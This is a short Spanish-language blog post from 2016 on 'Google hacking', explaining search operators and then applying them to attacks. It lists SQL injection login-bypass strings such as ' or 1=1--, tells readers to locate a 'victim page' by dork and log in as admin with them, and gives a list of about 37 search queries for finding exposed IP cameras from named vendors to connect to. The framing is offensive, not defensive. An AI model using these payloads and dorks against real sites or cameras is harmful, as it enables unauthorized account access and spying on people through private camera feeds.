domingo, 24 de abril de 2016

Google Hacking

GOOGLE HACKING
Hola lectores en este artículo hablaremos sobre google hacking un tema muy conocido comencemos :
También es conocido como
PEBAG(Parametors Especiales de Busqueda Avanzada de Google)
En una manera muy simple google hacking es un método de búsqueda donde se utiliza comando o operadores  con los cuales podemos hacer que se filtre información y con ello tener una mejor búsqueda obtenemos resultados mas sensibles .
ALGUNOS OPERADORES:

+: Realiza búsquedas que contenga los dos términos buscados 


-: realizamos una búsqueda y incluimos la palabra que no queremos que se relacione


OR (I): Realiza búsquedas que contenga uno de los dos términos buscados


AND: Hace búsquedas que contenga dos resultados

COMANDOS 
inurl 
inurl:login.asp
Busca el directorio compuesto de login.asp que se encuentre como parte de la URL. Además podemos intercambiar las búsquedas y en vez de login.asp podemos poner algo como: admin .asp, password, administador.asp, etc...

filetype
Es un operador que nos permite hacer búsqueda de ficheros con extensiones específicos. Por ejemplo en el ejemplo le estamos diciendo que busque archivos de Excel (.xls) que hagan referencia a la palabra “contraseñas”.
filetype.xls "contraseña"

link
Este operador muestra todos los sitios web que en sus paginas tengan links que apunten la url www.presidencia.gob.pe, con esto investigamos que tipo de relación tiene con otras empresas y mas información acerca e esta

author
author: TheAprendo4567
Esto hara una búsqueda en google por todos sitios, foros, blogs, en la cual haya comentado e iniciado un tema el usuario: TheAprendo4567
site :
site busca dentro de la pagina seleccionada la palabra o el literal que mencionamos entre comillas


Google Hacking + sql Injection 

' or '1'='1
' or 'x'='x
' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --
'or'1=1'

========================================­========
and 1=1--
and 1=1
Esto ya aparece en varios videos es solo una recopilación

Primero utilizamos google hacking para buscar la pagina victima 
   
Esta es la pagina victima usuario: admin contraseña: cualquiera de las especificadas anteriormente 

Sql inject es un método muy antiguo 
¿como sabemos si una pagina es vulnerable a sql inject ?
Para saber si una pagina es vulnerable a sql inject generalmente se le añade ‘ a su url que puede ser .cat.php?id=15 le añado ‘ al número 15 asi se si es vulnerable hay otras maneras que seguro tocaremos en otro post. 

GOOGLE HACKING + IP CAMERA
Generalmente en todo tipo de establecimiento o a algún lugar en que vamos podemos ver una cámara esa cámara puede que no sea segura y que cualquier persona con internet pueda conectarse a esa cámara .
La localización de cámaras ip mediante google hacking es un proceso sumamente fácil
Ahora los comandos para acceder a algunas cámaras ip , cabe resaltar que algunas cámaras ip son publicas .
inurl:/view.shtml

intitle:“Live View/-AXIS 210






Otros comandos que podemos encontrar en la web 
inurl: "ViewerFrame Mode = 
2. intitle: Axis 2400 servidor de vídeo 
3. inurl: /view.shtml 
4. intitle: "Live View / - AXIS" | inurl: view / view.shtml ^ 
5. inurl: ViewerFrame Mode = 
6. inurl: ViewerFrame Mode = Refresh 
7. inurl: axis-cgi / jpg 
8. inurl: axis-cgi / mjpg (motion-JPEG) 
9. inurl: view / indexFrame.shtml 
10. inurl: view / index.shtml 
11. inurl: view / view.shtml 
12. 
LiveApplet 
13. intitle: "visualización en vivo" intitle: eje 
14. intitle: LiveApplet 
15. allintitle: "La cámara de red NetworkCamera" 
16. intitle: axis intitle: "video server" 
17. intitle: liveapplet inurl: LvAppl 
18. intitle: "EvoCam" inurl: "webcam.html" 
19. intitle: "Live alimentación NetSnap Cam-Server" 
20. intitle: "Live View / - AXIS" 
21. intitle: "Live View / - AXIS 206M" 
22. intitle: "Live View / - AXIS 206W" 
23. intitle: "Live View / - AXIS 210" 
24. inurl: indexFrame.shtml Axis 
25. inurl: "? MultiCameraFrame Mode = Motion" 
26. intitle: start inurl: cgistart 
27. intitle: "WJ-NT104 Página Principal" 
28. intext: "MOBOTIX M1" intext: "Abrir menú" 
29. intext: "MOBOTIX M10" intext: "Abrir menú" 
30. intext: "MOBOTIX D10" intext: "Abrir menú" 
31. intitle: snc-z20 inurl: home / 
32. intitle: snc-cs3 inurl: home / 
33. intitle: snc-RZ30 inurl: inicio / 
34. intitle: "sony cámara de red SNC-P1" 
35. intitle: "sony network camera snc-m1" 
36. 
El sitio: .viewnetcam.com -www.viewnetcam.com 
37. intitle: "Cámara Toshiba red" de inicio de sesión de usuario 



Este es mi primer Post espero que les guste si tienen sugerencias o dudas dejenlas en el comentario 
Att:Fernando Velasquez 

No hay comentarios:

Publicar un comentario